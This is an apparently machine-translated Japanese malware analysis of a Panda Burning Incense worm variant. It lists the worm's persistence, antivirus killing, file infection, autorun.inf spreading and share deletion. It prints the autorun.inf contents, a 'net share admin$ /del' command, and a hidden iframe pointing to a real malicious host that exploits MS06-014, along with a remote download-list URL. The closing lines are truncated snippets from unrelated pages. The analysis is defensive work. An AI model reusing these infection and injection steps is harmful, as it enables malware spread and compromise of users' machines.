5つ、テクニカル分析
1:ウイルスファイルが実行された後、自分自身を%SystemRoot%\\ system32 \\ drivers \\ nvscv32.exeにコピーしますBr>
レジストリの自動起動アイテムを作成します。
[HKEY_CURRENT_USER \\ Software \\ Microsoft \\ Windows \\ CurrentVersion \\ Run \\]
nvscv32: "C:\\ Windows \\ system32 \\ drivers \\ Nvscv32.exe "
2:アンチウイルスフォームウイルスの終了に関連するプロセスを検索します。
3:以下のプロセスを終了します。
4:以下のサービスを無効にする。
5:次のレジストリキーを削除します。
6:すべての実行可能ファイルに感染させ、アイコンをに変更します(今回はパンダ焼き香のアイコンではありません)。
7:以下のディレクトリをスキップします。
8:* .ghoバックアップファイルを削除します。
9:ドライブのすべてのルートディレクトリにsetup.exeというファイルのコピーを作成し、ウイルスが自動的に実行されるようにautorun.infファイルを作成して、ファイル属性を隠しファイル、読み取り専用ファイル、およびシステムに設定します。
autorun.infの内容:
[AutoRun]
OPEN = setup.exe
shellexecute = setup.exe
shell \\ Auto \\ command = setup.exe
10:共有を削除します。cmd.exe /c net共有admin $ /del /y
11:マシン上のすべてのスクリプトファイルに< iframe src = http://www.krvkr.com/を追加します。 Worm.htm width = "0" height = "0">< /iframe>このシステムでは、ユーザーがウイルスでサーバー上のWebページを閲覧すると、MS-06014の脆弱性を悪用するWebページトロイの木馬です。パッチを適用しない場合は、このウイルスをダウンロードして実行します。
12:LANマシンをスキャンし、脆弱性が見つかるとすぐに広がります。
13:バックグラウンドでhttp://wwwにアクセスしてください。 Whboy Net /update /wormcn Txt、ダウンロードリストに従って他のウイルスをダウンロードしてください。
現在のダウンロードリストは次のとおりです。(以下のリンクはすべて危険な内容です。クリックしないでください。)
このウイルスの動作に対して分析は完了しました。
のようにXPをドレスアップするWin7のベータ版の発売と公式版のリリースにより、ますます多くの人々がWin7に注意を払っています。さまざまな機能の新機能だけでなく、カラフルでゴージャスなテーマスタイル
Windows XPのネットワーク機能は非常に強力で高度に自動化されています。しかし、デフォルトでは、Windows XPにもネットワーク管理と設定に「グロテスクな気性」があるため、W
を簡単に作成できますか? Windows Preinstallation Environmentの略です。 CDから起動することができるWindows XPのセットを作るのに使用することができます。フ
まず、PConlineソリューション 1.ネットワークを取り外し、 2. WinXPセキュリティモードに再度入り、Panda燃えるウイルスプロセスはロードされていません、あなたは「タスクマネージャ